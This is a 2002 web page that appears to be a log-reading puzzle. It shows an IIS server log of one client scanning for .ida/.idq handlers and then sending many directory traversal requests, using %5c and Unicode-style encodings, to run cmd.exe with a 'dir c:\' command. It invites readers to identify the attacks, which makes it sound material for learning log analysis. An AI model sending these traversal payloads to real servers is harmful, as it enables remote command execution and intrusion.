January 11, 2002
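This is a copy of the IIS log from one of our web
servers. Each entry below is wrapped across two or three lines, and the
three-digit number that follows the request is the HTTP status code the
server returned. Can you guess the attacks
performed here? If so, email us at mrcorp@mrcorp.net.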
2002-01-11 16:39:25 212.195.2.148 - 68.37.60.44
80 HEAD /index.htm - 200 274 230 50 68.37.60.44 -
2002-01-11 16:39:27 212.195.2.148 - 68.37.60.44
80 HEAD /index.htm - 200 274 230 10 68.37.60.44 -
2002-01-11 16:39:27 212.195.2.148 - 68.37.60.44
80 GET /index.idc - 404 95 238 50 68.37.60.44 -
2002-01-11 16:39:28 212.195.2.148 - 68.37.60.44
80 GET /index.idw - 404 3396 238 30 68.37.60.44 -
2002-01-11 16:39:29 212.195.2.148 - 68.37.60.44
80 GET /index.ida - 200 158 238 20 68.37.60.44 -
2002-01-11 16:39:29 212.195.2.148 - 68.37.60.44
80 GET /index.idq - 200 158 238 20 68.37.60.44 -
2002-01-11 16:39:31 212.195.2.148 - 68.37.60.44
80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 3396
301 20 68.37.60.44 -
2002-01-11 16:39:32 212.195.2.148 - 68.37.60.44
80 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 3439 298 21 68.37.60.44 -
2002-01-11 16:39:33 212.195.2.148 - 68.37.60.44
80 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 3439 304 10 68.37.60.44 -
2002-01-11 16:39:34 212.195.2.148 - 68.37.60.44
80 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 3439 310 20 68.37.60.44 -
2002-01-11 16:39:35 212.195.2.148 - 68.37.60.44
80 GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\
403 3439 296 10 68.37.60.44 -
2002-01-11 16:39:36 212.195.2.148 - 68.37.60.44
80 GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\
403 3439 296 10 68.37.60.44 -
2002-01-11 16:39:37 212.195.2.148 - 68.37.60.44
80 GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\
403 3439 304 10 68.37.60.44 -
2002-01-11 16:39:37 212.195.2.148 - 68.37.60.44
80 GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\
403 3439 312 10 68.37.60.44 -
2002-01-11 16:39:42 212.195.2.148 - 68.37.60.44
80 GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 0 309 0 68.37.60.44 -
2002-01-11 16:39:43 212.195.2.148 - 68.37.60.44
80 GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 0 309 10 68.37.60.44 -
2002-01-11 16:39:43 212.195.2.148 - 68.37.60.44
80 GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 0 319 0 68.37.60.44 -
2002-01-11 16:39:44 212.195.2.148 - 68.37.60.44
80 GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 0 329 0 68.37.60.44 -
2002-01-11 16:39:44 212.195.2.148 - 68.37.60.44
80 GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\
404 3396 292 20 68.37.60.44 -
2002-01-11 16:39:46 212.195.2.148 - 68.37.60.44
80 GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\
404 3396 292 20 68.37.60.44 -
2002-01-11 16:39:47 212.195.2.148 - 68.37.60.44
80 GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\
404 3396 298 20 68.37.60.44 -
2002-01-11 16:39:48 212.195.2.148 - 68.37.60.44
80 GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\
404 3396 304 20 68.37.60.44 -
2002-01-11 16:39:49 212.195.2.148 - 68.37.60.44
80 GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\
404 3396 287 20 68.37.60.44 -
2002-01-11 16:39:50 212.195.2.148 - 68.37.60.44
80 GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\
404 3396 287 20 68.37.60.44 -
2002-01-11 16:39:51 212.195.2.148 - 68.37.60.44
80 GET /Rpc/..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\
404 3396 280 20 68.37.60.44 -
2002-01-11 16:39:52 212.195.2.148 - 68.37.60.44
80 GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\
404 3396 293 20 68.37.60.44 -
2002-01-11 16:39:54 212.195.2.148 - 68.37.60.44
80 GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\
404 3396 299 20 68.37.60.44 -
2002-01-11 16:39:55 212.195.2.148 - 68.37.60.44
80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 3396
281 20 68.37.60.44 -
2002-01-11 16:39:56 212.195.2.148 - 68.37.60.44
80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 3396
280 20 68.37.60.44 -
2002-01-11 16:39:57 212.195.2.148 - 68.37.60.44
80 GET /scripts/..Á%pc../winnt/system32/cmd.exe /c+dir+c:\
500 0 281 0 68.37.60.44 -
2002-01-11 16:40:00 212.195.2.148 - 68.37.60.44
80 GET /scripts/..À%9v../winnt/system32/cmd.exe /c+dir+c:\
500 0 281 0 68.37.60.44 -
2002-01-11 16:40:00 212.195.2.148 - 68.37.60.44
80 GET /scripts/..À%qf../winnt/system32/cmd.exe /c+dir+c:\
500 0 281 0 68.37.60.44 -
2002-01-11 16:40:02 212.195.2.148 - 68.37.60.44
80 GET /scripts/..Á%8s../winnt/system32/cmd.exe /c+dir+c:\
500 0 281 10 68.37.60.44 -
2002-01-11 16:40:02 212.195.2.148 - 68.37.60.44
80 GET /scripts/..Á_../winnt/system32/cmd.exe /c+dir+c:\
500 0 281 10 68.37.60.44 -
2002-01-11 16:40:03 212.195.2.148 - 68.37.60.44
80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 3396
281 20 68.37.60.44 -
2002-01-11 16:40:04 212.195.2.148 - 68.37.60.44
80 GET /scripts/..o../winnt/system32/cmd.exe /c+dir+c:\
404 3396 281 20 68.37.60.44 -
2002-01-11 16:40:05 212.195.2.148 - 68.37.60.44
80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 3396
284 20 68.37.60.44 -
2002-01-11 16:40:06 212.195.2.148 - 68.37.60.44
80 GET /scripts/..ð€€¯../winnt/system32/cmd.exe /c+dir+c:\
404 3396 287 20 68.37.60.44 -
2002-01-11 16:40:07 212.195.2.148 - 68.37.60.44
80 GET /scripts/..ø€€€¯../winnt/system32/cmd.exe /c+dir+c:\
404 3396 290 20 68.37.60.44 -
2002-01-11 16:40:11 212.195.2.148 - 68.37.60.44
80 GET /scripts/..ü€€€€¯../winnt/system32/cmd.exe /c+dir+c:\
404 3396 293 20 68.37.60.44 -
2002-01-11 16:40:12 212.195.2.148 - 68.37.60.44
80 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\
500 0 284 0 68.37.60.44 -
2002-01-11 16:40:12 212.195.2.148 - 68.37.60.44
80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 3396
303 20 68.37.60.44 -
2002-01-11 16:40:14 212.195.2.148 - 68.37.60.44
80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 3396
303 20 68.37.60.44 -
2002-01-11 16:40:15 212.195.2.148 - 68.37.60.44
80 GET /cgi-bin/..Á%pc../..Á%pc../..Á%pc../winnt/system32/cmd.exe /c+dir+c:\ 404 3396 303 20 68.37.60.44 -
2002-01-11 16:40:16 212.195.2.148 - 68.37.60.44
80 GET /cgi-bin/..À%9v../..À%9v../..À%9v../winnt/system32/cmd.exe /c+dir+c:\ 404 3396 303 30 68.37.60.44 -
2002-01-11 16:40:17 212.195.2.148 - 68.37.60.44
80 GET /cgi-bin/..À%qf../..À%qf../..À%qf../winnt/system32/cmd.exe /c+dir+c:\ 404 3396 303 20 68.37.60.44 -
2002-01-11 16:40:18 212.195.2.148 - 68.37.60.44
80 GET /cgi-bin/..Á%8s../..Á%8s../..Á%8s../winnt/system32/cmd.exe /c+dir+c:\ 404 3396 303 20 68.37.60.44 -